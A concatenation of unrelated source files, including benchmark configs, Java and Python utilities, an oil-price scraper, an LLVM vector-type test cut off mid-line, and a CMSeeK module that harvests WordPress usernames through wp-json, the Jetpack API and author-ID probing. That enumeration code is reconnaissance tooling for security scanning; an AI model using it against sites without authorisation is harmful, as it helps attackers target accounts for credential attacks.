_BMARK_START_(206) { 1, 2, NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(INFINITE), NO_REPLY, START_MSG_ID } _BMARK_END_ /** * Mote 1 starts contin. sending msgs to Mote 2 when the test starts. (1st edge) * Also Mote 1 is sending cont. broadcast msgs. (2nd edge) * Mote 3 sends at most 100 messages to Mote 1, request acks, and if it receives an ack, stops. (3rd edge) * * Note that this way the broadcast messages (2nd edge) are heared by Mote 2 and Mote 3, so the receiver side * statistics will be the double of the sender side ones on the 2nd edge. (Since every broadcast message sent by Mote 1 is heared by two motes!) */ _BMARK_START_(207) { 1, 2 , NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(INFINITE), NO_REPLY, START_MSG_ID }, { 1, ALL, NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(INFINITE), NO_REPLY, START_MSG_ID }, { 3, 1 , NO_TIMER , { SEND_ON_INIT, STOP_ON_ACK, 0, 0, 0 }, NUM(100), NO_REPLY, START_MSG_ID } _BMARK_END_ // Send one message on every timer tick. Timer1 is used. _BMARK_START_(208) { 1, 2, {TIMER(1),0} , { SEND_ON_TIMER, 0, 0, 0, 0 }, NUM(1), NO_REPLY, START_MSG_ID } _BMARK_END_ /* 1st edge: Send at most 10 messages on every timer tick. If ack received, stop sending. Timer1 is used. * 2nd edge: Send one broadcast message to every node when Timer2 tickens. */ _BMARK_START_(209) { 1, 2, {TIMER(1),0} , { SEND_ON_TIMER, STOP_ON_ACK, 0, 0, 0 }, NUM(10), NO_REPLY, START_MSG_ID }, { 1, ALL, {TIMER(2),0} , { SEND_ON_TIMER, 0, 0, 0, 0 }, NUM(1), NO_REPLY, START_MSG_ID } _BMARK_END_ /* Start cont. sending messages on every timer tick of Timer1, and stop sending if Timer2 tickens. * By changing the type (oneshot/periodic) and frequency of the timers, different traffic patterns are * likely to be generated. */ _BMARK_START_(210) { 1, 2, {TIMER(1),TIMER(2)} , { SEND_ON_TIMER, STOP_ON_TIMER, 0, 0, 0 }, NUM(INFINITE), NO_REPLY, START_MSG_ID } _BMARK_END_ /* Mote 1 sends 3 messages on every timer tick of Timer1. * Mote 2 starts cont. sending messages when the test starts and stops it if Timer2 tickens * or receives an ack, whichever comes first. */ _BMARK_START_(211) { 1, 2, {TIMER(1), 0} , { SEND_ON_TIMER, 0, 0, 0, 0 }, NUM(3), NO_REPLY, START_MSG_ID }, { 2, 1, {0,TIMER(2)} , { SEND_ON_INIT, STOP_ON_TIMER | STOP_ON_ACK , 0, 0, 0 }, NUM(INFINITE), NO_REPLY, START_MSG_ID } _BMARK_END_ /* Mote 1 sends 2 messages to Mote 2 on every Timer1 ticks. It stops (only sends one message) if Mote 2 * acknowledges the message. * If Mote 2 hears a message, it replies on edge 1 ( see REPLY_ON(1) of the 1st edge ), which means it * will send one message to Mote 3 (2nd edge). * Since REPLY_ON(2) is present in the 2nd edge, every time Mote 3 hears a message, it should reply on the * 3rd edge: sends one message to Mote 1. */ _BMARK_START_(212) { 1, 2, {TIMER(1),0}, { SEND_ON_TIMER, STOP_ON_ACK, 0, 0, 0 }, NUM(2), REPLY_ON(1), START_MSG_ID }, { 2, 3, NO_TIMER , { SEND_ON_REQ, 0, 0, 0, 0 }, NUM(1), REPLY_ON(2), START_MSG_ID }, { 3, 1, NO_TIMER , { SEND_ON_REQ, 0, 0, 0, 0 }, NUM(1), NO_REPLY, START_MSG_ID } _BMARK_END_ /* 1st edge : Mote 1 -> Mote 2: Exactly 2 messages on Timer1 ticks, request acks. * - every time Mote 2 hears a message from this edge, it should reply on the 3rd edge ( see REPLY_ON(2) ) * 2nd edge : Mote 3 -> Mote 2: One message on every Timer2 ticks, stop either on Timer3 ticks or on acks. * - note that in this case the STOP_ON_X policies are useless, since * on this edge only one message is to be sent, so no use to 'stop' it... * - every time Mote 2 hears a message from this edge, it should reply on the 3rd edge ( see REPLY_ON(2) ) * 3rd edge : Mote 2 broadcasts exactly one message. * - if anyone (Mote 1,Mote 3) hears it, it should reply on the 4th edge ( REPLY_ON(3) ). Since the 4th edge's * sender is 3, this only applies for Mote 3. * 4th edge : Mote 3 -> Mote 1: Exactly 4 messages to transmit. * - note that this edge has SEND_ON_INIT, so 4 messages are also transmitted when the test starts, * not just when Mote 3 replies for messages it gets on the 3rd edge! */ _BMARK_START_(213) { 1, 2, {TIMER(1),0}, { SEND_ON_TIMER, 0, NEED_ACK, 0, 0 }, NUM(2), REPLY_ON(2), START_MSG_ID }, { 3, 2, {TIMER(2),TIMER(3)}, { SEND_ON_TIMER, STOP_ON_TIMER | STOP_ON_ACK, 0, 0, 0 }, NUM(1), REPLY_ON(2), START_MSG_ID }, { 2, ALL, NO_TIMER , { SEND_ON_REQ, 0, 0, 0, 0 }, NUM(1), REPLY_ON(3), START_MSG_ID }, { 3, 1, NO_TIMER , { SEND_ON_INIT, 0, 0, 0, 0 }, NUM(4) , NO_REPLY, START_MSG_ID } _BMARK_END_
4,067
375
package io.lumify.core.model.properties.types; import io.lumify.core.exception.LumifyException; import io.lumify.core.ingest.video.VideoTranscript; import org.securegraph.property.StreamingPropertyValue; import org.apache.commons.io.IOUtils; import org.json.JSONObject; import java.io.ByteArrayInputStream; import java.io.IOException; import java.io.InputStream; public class VideoTranscriptProperty extends LumifyProperty<VideoTranscript, StreamingPropertyValue> { public VideoTranscriptProperty(String inKey) { super(inKey); } @Override public StreamingPropertyValue wrap(VideoTranscript value) { InputStream in = new ByteArrayInputStream(value.toJson().toString().getBytes()); StreamingPropertyValue result = new StreamingPropertyValue(in, byte[].class); result.searchIndex(false); return result; } @Override public VideoTranscript unwrap(Object value) { String strValue = null; if (value instanceof StreamingPropertyValue) { try { strValue = IOUtils.toString(((StreamingPropertyValue) value).getInputStream()); } catch (IOException e) { throw new LumifyException("Could not read propery value", e); } } else if (value != null) { strValue = value.toString(); } JSONObject json = new JSONObject(strValue); return new VideoTranscript(json); } }
544
2,912
""" Implements method forwarding from one class to another. The `Forwarding` class can be used as a mixin. """ import inspect import warnings class Forwarding(object): @classmethod def _get_class_that_defined_method(cls, meth): """ Returns the class that defines the requested method. For methods that are defined outside of a particular set of Grizzly-defined classes, Grizzly will first evaluate lazy results before forwarding the data to the requested class. """ if inspect.ismethod(meth): for cls in inspect.getmro(meth.__self__.__class__): if cls.__dict__.get(meth.__name__) is meth: return cls if inspect.isfunction(meth): return getattr(inspect.getmodule(meth), meth.__qualname__.split('.<locals>', 1)[0].rsplit('.', 1)[0]) @classmethod def _requires_forwarding(cls, meth): defined_in = cls._get_class_that_defined_method(meth) if defined_in is not None and defined_in is not cls: return True else: return False @classmethod def _forward(cls, to_cls): from functools import wraps def forward_decorator(func): @wraps(func) def forwarding_wrapper(self, *args, **kwargs): self.evaluate() result = func(self, *args, **kwargs) # Unsupported functions will return Series -- try to # switch back to GrizzlySeries. if not isinstance(result, cls) and isinstance(result, to_cls): try_convert = cls(data=result.values, index=result.index) if not isinstance(try_convert, cls): warnings.warn("Unsupported operation '{}' produced unsupported Series: falling back to Pandas".format( func.__name__)) return try_convert return result return forwarding_wrapper return forward_decorator @classmethod def add_forwarding_methods(cls, to_cls): """ Add forwarding methods from this class to `to_cls`. """ methods = dir(cls) for meth in methods: if meth.startswith("_"): # We only want to do this for API methods. continue attr = getattr(cls, meth) if cls._requires_forwarding(attr): setattr(cls, meth, cls._forward(to_cls)(attr))
1,193
414
<reponame>zjbjbj/Poplar<gh_stars>100-1000 package com.lvwangbeta.poplar.tag.service; import java.util.ArrayList; import java.util.List; import com.alibaba.dubbo.config.annotation.Service; import com.lvwangbeta.poplar.common.intr.TagService; import com.lvwangbeta.poplar.common.model.Tag; import com.lvwangbeta.poplar.tag.dao.TagDAO; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.beans.factory.annotation.Qualifier; @Service public class TagServiceImpl implements TagService { //@Autowired //@Qualifier("tagIndexService") //private TagIndexService tagIndexService; @Autowired @Qualifier("tagDao") private TagDAO tagDao; /* public List<Tag> searchTag(String term) { List<Integer> tag_ids = tagIndexService.findTag(term); return getTagsByIDs(tag_ids); } */ /** * 获取推荐tag * 简单实现,获取有cover的tag * @param user_id * @return */ public List<Tag> getRecommendTags(int user_id){ return tagDao.getTagsHasCover(); } public Tag getTagByID(int id) { return tagDao.getTagByID(id); } public List<Tag> getTagsByIDs(List<Integer> ids) { List<String> ids_str = new ArrayList<String>(); for(int i=0; i<ids.size(); i++) { ids_str.add(String.valueOf(ids.get(i))); } return tagDao.getTags(ids_str.toString().replace('[', ' ').replace(']', ' ')); } }
603
4,202
<filename>akshare/energy/energy_oil.py<gh_stars>1000+ # -*- coding:utf-8 -*- #!/usr/bin/env python """ Date: 2020/4/2 20:24 Desc: 东方财富-数据中心-中国油价 http://data.eastmoney.com/cjsj/oil_default.html """ import json import pandas as pd import requests def energy_oil_hist() -> pd.DataFrame: """ 汽柴油历史调价信息 http://data.eastmoney.com/cjsj/oil_default.html :return: 汽柴油历史调价数 :rtype: pandas.DataFrame """ url = "http://datacenter.eastmoney.com/api/data/get" params = { "type": "RPTA_WEB_YJ_BD", "sty": "ALL", "source": "WEB", "p": "1", "ps": "5000", "st": "dim_date", "sr": "-1", "var": "OxGINxug", "rt": "52861006", } r = requests.get(url, params=params) data_text = r.text data_json = json.loads(data_text[data_text.find("{"): -1]) temp_df = pd.DataFrame(data_json["result"]["data"]) temp_df.columns = ["日期", "汽油价格", "柴油价格", "汽油涨幅", "柴油涨幅"] return temp_df def energy_oil_detail(date: str = "2020-03-19") -> pd.DataFrame: """ 全国各地区的汽油和柴油油价 http://data.eastmoney.com/cjsj/oil_default.html :param date: call function: energy_oil_hist to get the date point :type date: str :return: oil price at specific date :rtype: pandas.DataFrame """ url = "http://datacenter.eastmoney.com/api/data/get" params = { "type": "RPTA_WEB_YJ_JH", "sty": "ALL", "source": "WEB", "p": "1", "ps": "5000", "st": "cityname", "sr": "1", "filter": f'(dim_date="{date}")', "var": "todayPriceData", } r = requests.get(url, params=params) data_text = r.text data_json = json.loads(data_text[data_text.find("{"): -1]) temp_df = pd.DataFrame(data_json["result"]["data"]).iloc[:, 1:] return temp_df if __name__ == "__main__": energy_oil_hist_df = energy_oil_hist() print(energy_oil_hist_df) energy_oil_detail_df = energy_oil_detail(date="2021-04-01") print(energy_oil_detail_df)
1,084
1,103
#!/usr/bin/python3 # -*- coding: utf-8 -*- # This is a part of CMSeeK, check the LICENSE file for more information # Copyright (c) 2018 Tuhinshubhra import cmseekdb.basic as cmseek ## Good old module import re ## Comes in handy while detecting version import json ## For parsing the wpvulndb result import threading wpparamuser = [] def wpauthorenum(ua, url, param): ## WordPress function for Collecting usernames from author Parameter ## Had to create a different function to avoid some pickle issues global wpparamuser param = param + 1 i = str(param) # cmseek.statement('Checking for ?author=' + i) # Looks Ugly.. enable if you want over verbose result authorsrc = cmseek.getsource(url + '/?author=' + i, ua) if authorsrc[0] == '1' and '/author/' in authorsrc[3]: ## Detection using the url redirection author = re.findall(r'/author/(.*?)/', str(authorsrc[3])) if author != []: cmseek.success('Found user from redirection: ' + cmseek.fgreen + cmseek.bold + author[0] + cmseek.cln) wpparamuser.append(author[0]) elif authorsrc[0] == '1' and '/author/' in authorsrc[1]: author = re.findall(r'/author/(.*?)/', str(authorsrc[1])) if author != []: cmseek.success('Found user from source code: ' + cmseek.fgreen + cmseek.bold + author[0] + cmseek.cln) wpparamuser.append(author[0]) def start(id, url, ua, ga, source): cmseek.info("Starting Username Harvest") # User enumertion via site's json api cmseek.info('Harvesting usernames from wp-json api') wpjsonuser = [] wpjsonsrc = cmseek.getsource(url + '/wp-json/wp/v2/users', ua) if wpjsonsrc[0] != "1" or 'slug' not in wpjsonsrc[1]: cmseek.warning("Json api method failed trying with next") else: try: for user in json.loads(wpjsonsrc[1]): wpjsonuser.append(user['slug']) cmseek.success("Found user from wp-json : " + cmseek.fgreen + cmseek.bold + user['slug'] + cmseek.cln) except: cmseek.warning("Failed to parse json") # user enumertion vua jetpack api cmseek.info('Harvesting usernames from jetpack public api') jpapiuser = [] strippedurl = url.replace('http://','') strippedurl = strippedurl.replace('https://', '') # Pretty sure it is an ugly solution but oh well jpapisrc = cmseek.getsource('https://public-api.wordpress.com/rest/v1.1/sites/' + strippedurl + '/posts?number=100&pretty=true&fields=author', ua) if jpapisrc[0] != '1' or 'login' not in jpapisrc[1]: cmseek.warning('No results from jetpack api... maybe the site doesn\'t use jetpack') else: for user in json.loads(jpapisrc[1])['posts']: if user['author']['login'] not in str(jpapiuser): jpapiuser.append(user['author']['login']) cmseek.success("Found user from Jetpack api : " + cmseek.fgreen + cmseek.bold + user['author']['login'] + cmseek.cln) jpapiuser = list(set(usr.strip() for usr in jpapiuser)) # Removing duplicate usernames # the regular way of checking vua user Parameter -- For now just check upto 20 ids cmseek.info('Harvesting usernames from wordpress author Parameter') usrrange = range(31) # ain't it Obvious threads = [threading.Thread(target=wpauthorenum, args=(ua,url,r)) for r in usrrange] for thread in threads: thread.start() for thread in threads: thread.join() global wpparamuser # Combine all the usernames that we collected usernames = set(wpjsonuser+jpapiuser+wpparamuser) if len(usernames) > 0: usernamesgen = '1' # Some usernames were harvested if len(usernames) == 1: cmseek.success(cmseek.bold + cmseek.fgreen + str(len(usernames)) + " Usernames" + " was enumerated" + cmseek.cln) else: cmseek.success(cmseek.bold + cmseek.fgreen + str(len(usernames)) + " Usernames" + " were enumerated" + cmseek.cln) else: usernamesgen = '0' # Failure cmseek.warning("Couldn't enumerate usernames :( ") return [usernamesgen, usernames]
1,674
526
/* SPDX-License-Identifier: Apache-2.0 */ /* Copyright Contributors to the ODPi Egeria project. */ package org.odpi.openmetadata.accessservices.governanceprogram.handlers; import org.odpi.openmetadata.accessservices.governanceprogram.properties.GovernanceDomain; import org.odpi.openmetadata.repositoryservices.connectors.stores.metadatacollectionstore.properties.instances.EnumPropertyValue; import org.odpi.openmetadata.repositoryservices.connectors.stores.metadatacollectionstore.properties.instances.InstanceProperties; import org.odpi.openmetadata.repositoryservices.connectors.stores.metadatacollectionstore.properties.instances.InstancePropertyValue; import org.odpi.openmetadata.repositoryservices.connectors.stores.metadatacollectionstore.repositoryconnector.OMRSRepositoryHelper; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * GovernanceProgramEnumHandler manages the mapping between Enums in the OMAS API and the open metadata types. */ class GovernanceProgramEnumHandler { private static final Logger log = LoggerFactory.getLogger(GovernanceProgramEnumHandler.class); private String serviceName; private OMRSRepositoryHelper repositoryHelper; /** * Construct the enum handler handler with a link to the property server's connector and this access service's * official name. * * @param repositoryHelper repository helper for the OMAS * @param serviceName name of this omas* @param serviceName name of this service */ GovernanceProgramEnumHandler(String serviceName, OMRSRepositoryHelper repositoryHelper) { this.serviceName = serviceName; this.repositoryHelper = repositoryHelper; } /** * Set up a property value for the GovernanceDomain enum property. * * @param properties current properties * @param governanceDomain enum value * @param propertyName name of the property that supplied the enum * @param methodName calling method * @return InstanceProperties object with the enum value added */ InstanceProperties addGovernanceDomainToProperties(InstanceProperties properties, GovernanceDomain governanceDomain, String propertyName, String methodName) { int ordinal = 999; String symbolicName = null; String description = null; log.debug("Governance domain: " + governanceDomain.getName()); final int element1Ordinal = 0; final String element1Value = "Unclassified"; final String element1Description = "The governance domain is not specified."; final int element2Ordinal = 1; final String element2Value = "Data"; final String element2Description = "The data (information) governance domain."; final int element3Ordinal = 2; final String element3Value = "Privacy"; final String element3Description = "The data privacy domain."; final int element4Ordinal = 3; final String element4Value = "Security"; final String element4Description = "The security governance domain."; final int element5Ordinal = 4; final String element5Value = "ITInfrastructure"; final String element5Description = "The IT infrastructure governance domain."; final int element6Ordinal = 5; final String element6Value = "SoftwareDevelopment"; final String element6Description = "The software development lifecycle governance domain."; final int element7Ordinal = 6; final String element7Value = "Corporate"; final String element7Description = "The corporate governance domain."; final int element8Ordinal = 7; final String element8Value = "AssetManagement"; final String element8Description = "The physical asset management governance domain."; final int element99Ordinal = 99; final String element99Value = "Other"; final String element99Description = "Another governance domain."; switch (governanceDomain) { case UNCLASSIFIED: ordinal = element1Ordinal; symbolicName = element1Value; description = element1Description; break; case DATA: ordinal = element2Ordinal; symbolicName = element2Value; description = element2Description; break; case PRIVACY: ordinal = element3Ordinal; symbolicName = element3Value; description = element3Description; break; case SECURITY: ordinal = element4Ordinal; symbolicName = element4Value; description = element4Description; break; case IT_INFRASTRUCTURE: ordinal = element5Ordinal; symbolicName = element5Value; description = element5Description; break; case SOFTWARE_DEVELOPMENT: ordinal = element6Ordinal; symbolicName = element6Value; description = element6Description; break; case CORPORATE: ordinal = element7Ordinal; symbolicName = element7Value; description = element7Description; break; case ASSET_MANAGEMENT: ordinal = element8Ordinal; symbolicName = element8Value; description = element8Description; break; case OTHER: ordinal = element99Ordinal; symbolicName = element99Value; description = element99Description; break; } return repositoryHelper.addEnumPropertyToInstance(serviceName, properties, propertyName, ordinal, symbolicName, description, methodName); } /** * Retrieve the GovernanceDomain enum property from the instance properties of an entity * * @param properties entity properties * @param propertyName name of the property that supplied the enum * @param methodName calling method * @return governanceDomain enum value */ GovernanceDomain getGovernanceDomainFromProperties(InstanceProperties properties, String propertyName, String methodName) { GovernanceDomain governanceDomain = GovernanceDomain.OTHER; if (properties != null) { InstancePropertyValue instancePropertyValue = properties.getPropertyValue(propertyName); if (instancePropertyValue instanceof EnumPropertyValue) { EnumPropertyValue enumPropertyValue = (EnumPropertyValue)instancePropertyValue; switch (enumPropertyValue.getOrdinal()) { case 0: governanceDomain = GovernanceDomain.UNCLASSIFIED; break; case 1: governanceDomain = GovernanceDomain.DATA; break; case 2: governanceDomain = GovernanceDomain.PRIVACY; break; case 3: governanceDomain = GovernanceDomain.SECURITY; break; case 4: governanceDomain = GovernanceDomain.IT_INFRASTRUCTURE; break; case 5: governanceDomain = GovernanceDomain.SOFTWARE_DEVELOPMENT; break; case 6: governanceDomain = GovernanceDomain.CORPORATE; break; case 7: governanceDomain = GovernanceDomain.ASSET_MANAGEMENT; break; case 99: governanceDomain = GovernanceDomain.OTHER; break; } } } log.debug("Governance domain: " + governanceDomain.getName() + " for method " + methodName); return governanceDomain; } }
4,447
938
<filename>src/main/java/slimeknights/tconstruct/common/network/UpdateNeighborsPacket.java package slimeknights.tconstruct.common.network; import lombok.RequiredArgsConstructor; import net.minecraft.block.Block; import net.minecraft.block.BlockState; import net.minecraft.client.Minecraft; import net.minecraft.network.PacketBuffer; import net.minecraft.util.math.BlockPos; import net.minecraft.world.World; import net.minecraftforge.common.util.Constants.BlockFlags; import net.minecraftforge.fml.network.NetworkEvent.Context; import net.minecraftforge.registries.GameData; import slimeknights.mantle.network.packet.IThreadsafePacket; /** * Packet to notify neighbors that a block changed, used when breaking blocks in weird contexts that vanilla suppresses updates in for some reason */ @RequiredArgsConstructor public class UpdateNeighborsPacket implements IThreadsafePacket { private final BlockState state; private final BlockPos pos; public UpdateNeighborsPacket(PacketBuffer buffer) { this.state = GameData.getBlockStateIDMap().getByValue(buffer.readVarInt()); this.pos = buffer.readBlockPos(); } @Override public void encode(PacketBuffer buffer) { buffer.writeVarInt(Block.getStateId(state)); buffer.writeBlockPos(pos); } @Override public void handleThreadsafe(Context context) { HandleClient.handle(this); } private static class HandleClient { private static void handle(UpdateNeighborsPacket packet) { World world = Minecraft.getInstance().world; if (world != null) { packet.state.updateNeighbours(world, packet.pos, BlockFlags.BLOCK_UPDATE, 511); packet.state.updateDiagonalNeighbors(world, packet.pos, BlockFlags.BLOCK_UPDATE, 511); } } } }
534
2,338
<gh_stars>1000+ //===--- llvm/unittest/IR/VectorTypesTest.cpp - vector types unit tests ---===// // // Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. // See https://llvm.org/LICENSE.txt for license information. // SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception // //===----------------------------------------------------------------------===// #include "llvm/IR/DataLayout.h" #include "llvm/IR/DerivedTypes.h" #include "llvm/IR/LLVMContext.h" #include "llvm/Support/TypeSize.h" #include "gtest/gtest.h" using namespace llvm; namespace { #define EXPECT_VTY_EQ(LHS, RHS) \ ASSERT_NE(LHS, nullptr) << #LHS << " must not be null"; \ ASSERT_NE(RHS, nullptr) << #RHS << " must not be null"; \ EXPECT_EQ(LHS, RHS) << "Expect that " << #LHS << " == " << #RHS << " where " \ << #LHS << " = " << *LHS << " and " << #RHS << " = " \ << *RHS; #define EXPECT_VTY_NE(LHS, RHS) \ ASSERT_NE(LHS, nullptr) << #LHS << " must not be null"; \ ASSERT_NE(RHS, nullptr) << #RHS << " must not be null"; \ EXPECT_NE(LHS, RHS) << "Expect that " << #LHS << " != " << #RHS << " where " \ << #LHS << " = " << *LHS << " and " << #RHS << " = " \ << *RHS; TEST(VectorTypesTest, FixedLength) { LLVMContext Ctx; Type *Int8Ty = Type::getInt8Ty(Ctx); Type *Int16Ty = Type::getInt16Ty(Ctx); Type *Int32Ty = Type::getInt32Ty(Ctx); Type *Int64Ty = Type::getInt64Ty(Ctx); Type *Float64Ty = Type::getDoubleTy(Ctx); auto *V16Int8Ty = FixedVectorType::get(Int8Ty, 16); ASSERT_NE(nullptr, V16Int8Ty); EXPECT_EQ(V16Int8Ty->getNumElements(), 16U); EXPECT_EQ(V16Int8Ty->getElementType()->getScalarSizeInBits(), 8U); auto *V8Int32Ty = dyn_cast<FixedVectorType>(VectorType::get(Int32Ty, 8, false)); ASSERT_NE(nullptr, V8Int32Ty); EXPECT_EQ(V8Int32Ty->getNumElements(), 8U); EXPECT_EQ(V8Int32Ty->getElementType()->getScalarSizeInBits(), 32U); auto *V8Int8Ty = dyn_cast<FixedVectorType>(VectorType::get(Int8Ty, V8Int32Ty)); EXPECT_VTY_NE(V8Int32Ty, V8Int8Ty); EXPECT_EQ(V8Int8Ty->getElementCount(), V8Int32Ty->getElementCount()); EXPECT_EQ(V8Int8Ty->getElementType()->getScalarSizeInBits(), 8U); auto *V8Int32Ty2 = dyn_cast<FixedVectorType>(VectorType::get(Int32Ty, V8Int32Ty)); EXPECT_VTY_EQ(V8Int32Ty, V8Int32Ty2); auto *V8Int16Ty = dyn_cast<FixedVectorType>( VectorType::get(Int16Ty, ElementCount::getFixed(8))); ASSERT_NE(nullptr, V8Int16Ty); EXPECT_EQ(V8Int16Ty->getNumElements(), 8U); EXPECT_EQ(V8Int16Ty->getElementType()->getScalarSizeInBits(), 16U); auto EltCnt = ElementCount::getFixed(4); auto *V4Int64Ty = dyn_cast<FixedVectorType>(VectorType::get(Int64Ty, EltCnt)); ASSERT_NE(nullptr, V4Int64Ty); EXPECT_EQ(V4Int64Ty->getNumElements(), 4U); EXPECT_EQ(V4Int64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *V2Int64Ty = dyn_cast<FixedVectorType>( VectorType::get(Int64Ty, EltCnt.divideCoefficientBy(2))); ASSERT_NE(nullptr, V2Int64Ty); EXPECT_EQ(V2Int64Ty->getNumElements(), 2U); EXPECT_EQ(V2Int64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *V8Int64Ty = dyn_cast<FixedVectorType>(VectorType::get(Int64Ty, EltCnt * 2)); ASSERT_NE(nullptr, V8Int64Ty); EXPECT_EQ(V8Int64Ty->getNumElements(), 8U); EXPECT_EQ(V8Int64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *V4Float64Ty = dyn_cast<FixedVectorType>(VectorType::get(Float64Ty, EltCnt)); ASSERT_NE(nullptr, V4Float64Ty); EXPECT_EQ(V4Float64Ty->getNumElements(), 4U); EXPECT_EQ(V4Float64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *ExtTy = dyn_cast<FixedVectorType>( VectorType::getExtendedElementVectorType(V8Int16Ty)); EXPECT_VTY_EQ(ExtTy, V8Int32Ty); EXPECT_EQ(ExtTy->getNumElements(), 8U); EXPECT_EQ(ExtTy->getElementType()->getScalarSizeInBits(), 32U); auto *TruncTy = dyn_cast<FixedVectorType>( VectorType::getTruncatedElementVectorType(V8Int32Ty)); EXPECT_VTY_EQ(TruncTy, V8Int16Ty); EXPECT_EQ(TruncTy->getNumElements(), 8U); EXPECT_EQ(TruncTy->getElementType()->getScalarSizeInBits(), 16U); auto *HalvedTy = dyn_cast<FixedVectorType>( VectorType::getHalfElementsVectorType(V4Int64Ty)); EXPECT_VTY_EQ(HalvedTy, V2Int64Ty); EXPECT_EQ(HalvedTy->getNumElements(), 2U); EXPECT_EQ(HalvedTy->getElementType()->getScalarSizeInBits(), 64U); auto *DoubledTy = dyn_cast<FixedVectorType>( VectorType::getDoubleElementsVectorType(V4Int64Ty)); EXPECT_VTY_EQ(DoubledTy, V8Int64Ty); EXPECT_EQ(DoubledTy->getNumElements(), 8U); EXPECT_EQ(DoubledTy->getElementType()->getScalarSizeInBits(), 64U); auto *ConvTy = dyn_cast<FixedVectorType>(VectorType::getInteger(V4Float64Ty)); EXPECT_VTY_EQ(ConvTy, V4Int64Ty); EXPECT_EQ(ConvTy->getNumElements(), 4U); EXPECT_EQ(ConvTy->getElementType()->getScalarSizeInBits(), 64U); EltCnt = V8Int64Ty->getElementCount(); EXPECT_EQ(EltCnt.getKnownMinValue(), 8U); ASSERT_FALSE(EltCnt.isScalable()); } TEST(VectorTypesTest, Scalable) { LLVMContext Ctx; Type *Int8Ty = Type::getInt8Ty(Ctx); Type *Int16Ty = Type::getInt16Ty(Ctx); Type *Int32Ty = Type::getInt32Ty(Ctx); Type *Int64Ty = Type::getInt64Ty(Ctx); Type *Float64Ty = Type::getDoubleTy(Ctx); auto *ScV16Int8Ty = ScalableVectorType::get(Int8Ty, 16); ASSERT_NE(nullptr, ScV16Int8Ty); EXPECT_EQ(ScV16Int8Ty->getMinNumElements(), 16U); EXPECT_EQ(ScV16Int8Ty->getScalarSizeInBits(), 8U); auto *ScV8Int32Ty = dyn_cast<ScalableVectorType>(VectorType::get(Int32Ty, 8, true)); ASSERT_NE(nullptr, ScV8Int32Ty); EXPECT_EQ(ScV8Int32Ty->getMinNumElements(), 8U); EXPECT_EQ(ScV8Int32Ty->getElementType()->getScalarSizeInBits(), 32U); auto *ScV8Int8Ty = dyn_cast<ScalableVectorType>(VectorType::get(Int8Ty, ScV8Int32Ty)); EXPECT_VTY_NE(ScV8Int32Ty, ScV8Int8Ty); EXPECT_EQ(ScV8Int8Ty->getElementCount(), ScV8Int32Ty->getElementCount()); EXPECT_EQ(ScV8Int8Ty->getElementType()->getScalarSizeInBits(), 8U); auto *ScV8Int32Ty2 = dyn_cast<ScalableVectorType>(VectorType::get(Int32Ty, ScV8Int32Ty)); EXPECT_VTY_EQ(ScV8Int32Ty, ScV8Int32Ty2); auto *ScV8Int16Ty = dyn_cast<ScalableVectorType>( VectorType::get(Int16Ty, ElementCount::getScalable(8))); ASSERT_NE(nullptr, ScV8Int16Ty); EXPECT_EQ(ScV8Int16Ty->getMinNumElements(), 8U); EXPECT_EQ(ScV8Int16Ty->getElementType()->getScalarSizeInBits(), 16U); auto EltCnt = ElementCount::getScalable(4); auto *ScV4Int64Ty = dyn_cast<ScalableVectorType>(VectorType::get(Int64Ty, EltCnt)); ASSERT_NE(nullptr, ScV4Int64Ty); EXPECT_EQ(ScV4Int64Ty->getMinNumElements(), 4U); EXPECT_EQ(ScV4Int64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *ScV2Int64Ty = dyn_cast<ScalableVectorType>( VectorType::get(Int64Ty, EltCnt.divideCoefficientBy(2))); ASSERT_NE(nullptr, ScV2Int64Ty); EXPECT_EQ(ScV2Int64Ty->getMinNumElements(), 2U); EXPECT_EQ(ScV2Int64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *ScV8Int64Ty = dyn_cast<ScalableVectorType>(VectorType::get(Int64Ty, EltCnt * 2)); ASSERT_NE(nullptr, ScV8Int64Ty); EXPECT_EQ(ScV8Int64Ty->getMinNumElements(), 8U); EXPECT_EQ(ScV8Int64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *ScV4Float64Ty = dyn_cast<ScalableVectorType>(VectorType::get(Float64Ty, EltCnt)); ASSERT_NE(nullptr, ScV4Float64Ty); EXPECT_EQ(ScV4Float64Ty->getMinNumElements(), 4U); EXPECT_EQ(ScV4Float64Ty->getElementType()->getScalarSizeInBits(), 64U); auto *ExtTy = dyn_cast<ScalableVectorType>( VectorType::getExtendedElementVectorType(ScV8Int16Ty)); EXPECT_VTY_EQ(ExtTy, ScV8Int32Ty); EXPECT_EQ(ExtTy->getMinNumElements(), 8U); EXPECT_EQ(ExtTy->getElementType()->getScalarSizeInBits(), 32U); auto *TruncTy = dyn_cast<ScalableVectorType>( VectorType::getTruncatedElementVectorType(ScV8Int32Ty)); EXPECT_VTY_EQ(TruncTy, ScV8Int16Ty); EXPECT_EQ(TruncTy->getMinNumElements(), 8U); EXPECT_EQ(TruncTy->getElementType()->getScalarSizeInBits(), 16U); auto *HalvedTy = dyn_cast<ScalableVectorType>( VectorType::getHalfElementsVectorType(ScV4Int64Ty)); EXPECT_VTY_EQ(HalvedTy, ScV2Int64Ty); EXPECT_EQ(HalvedTy->getMinNumElements(), 2U); EXPECT_EQ(HalvedTy->getElementType()->getScalarSizeInBits(), 64U); auto *DoubledTy = dyn_cast<ScalableVectorType>( VectorType::getDoubleElementsVectorType(ScV4Int64Ty)); EXPECT_VTY_EQ(DoubledTy, ScV8Int64Ty); EXPECT_EQ(DoubledTy->getMinNumElements(), 8U); EXPECT_EQ(DoubledTy->getElementType()->getScalarSizeInBits(), 64U); auto *ConvTy = dyn_cast<ScalableVectorType>(VectorType::getInteger(ScV4Float64Ty)); EXPECT_VTY_EQ(ConvTy, ScV4Int64Ty); EXPECT_EQ(ConvTy->getMinNumElements(), 4U); EXPECT_EQ(ConvTy->getElementType()->getScalarSizeInBits(), 